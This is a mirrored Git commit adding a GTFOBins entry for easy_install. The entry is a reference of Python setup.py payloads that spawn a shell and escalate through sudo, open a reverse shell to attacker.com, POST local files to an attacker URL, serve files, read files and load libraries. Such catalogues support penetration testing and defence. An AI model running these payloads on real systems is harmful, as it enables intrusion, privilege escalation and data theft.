mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Add easy_install
This commit is contained in:
parent
5087fa15ef
commit
0e639583d6
55
_gtfobins/easy_install.md
Normal file
55
_gtfobins/easy_install.md
Normal file
@ -0,0 +1,55 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
||||
easy_install $TF
|
||||
reverse-shell-interactive:
|
||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
TF=$(mktemp -d)
|
||||
echo 'import sys,socket,os,pty;s=socket.socket()
|
||||
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
|
||||
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
||||
pty.spawn("/bin/sh")' > $TF/setup.py
|
||||
easy_install $TF
|
||||
upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
export LFILE=file_to_send
|
||||
TF=$(mktemp -d)
|
||||
echo 'import sys; from os import environ as e
|
||||
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
|
||||
else: import urllib as u, urllib2 as r
|
||||
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' > $TF/setup.py
|
||||
easy_install $TF
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=8888
|
||||
TF=$(mktemp -d)
|
||||
echo 'import sys; from os import environ as e
|
||||
if sys.version_info.major == 3: import http.server as s, socketserver as ss
|
||||
else: import SimpleHTTPServer as s, SocketServer as ss
|
||||
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
|
||||
easy_install $TF
|
||||
file-read:
|
||||
- description: The read file content is wrapped within program messages.
|
||||
code: |
|
||||
TF=$(mktemp -d)
|
||||
echo 'print(open("file_to_read").read())' > $TF/setup.py
|
||||
easy_install $TF
|
||||
load-library:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py
|
||||
easy_install $TF
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
||||
sudo easy_install $TF
|
||||
---
|
Loading…
Reference in New Issue
Block a user